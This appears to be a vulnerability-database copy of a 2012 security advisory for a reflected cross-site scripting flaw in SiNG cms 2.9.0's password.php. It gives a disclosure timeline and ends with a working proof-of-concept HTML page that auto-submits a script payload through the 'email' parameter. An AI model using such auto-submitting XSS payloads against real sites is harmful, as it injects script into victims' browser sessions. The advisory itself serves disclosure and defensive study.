Lucene search
K

SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability

🗓️ 23 Aug 2012 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 27 Views

SiNG cms 2.9.0 Remote XSS POST Injection Vulnerability in 'email' parameter of 'password.php' allows execution of arbitrary HTML and script code in user's browser session. Vendor released version 2.9.1 to fix

Code
<!DOCTYPE html>
<!--

SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability


Vendor: Simple Network Gear
Product web page: http://www.sing-cms.ru
Affected version: 2.9.0

Summary: SiNG cms is a free modular Content Management System open
source, based on a bunch of PHP / MySQL and intended use of the web
server Apache.

Desc: The application is prone to a reflected cross-site scripting
vulnerability due to a failure to properly sanitize user-supplied
input to the 'email' POST parameter in the 'password.php' script.
Attackers can exploit this weakness to execute arbitrary HTML and
script code in a user's browser session.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[20.08.2012] Vulnerability discovered.
[20.08.2012] Initial contact with the vendor.
[22.08.2012] No response from the vendor.
[23.08.2012] Public security advisory released.


Advisory ID: ZSL-2012-5097
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5097.php


20.08.2012

--><html>
<head>
<title>SiNG cms 2.9.0 (email) Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form action="http://localhost/singcms/password.php" method="post" name="email">
<input name="email" type="hidden" value='"&gt;&lt;script&gt;alert("XSS");&lt;/script&gt;'/>
<input name="send" type="hidden" value="Send password"/>
</form>
<script type="text/javascript">
document.email.submit();
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation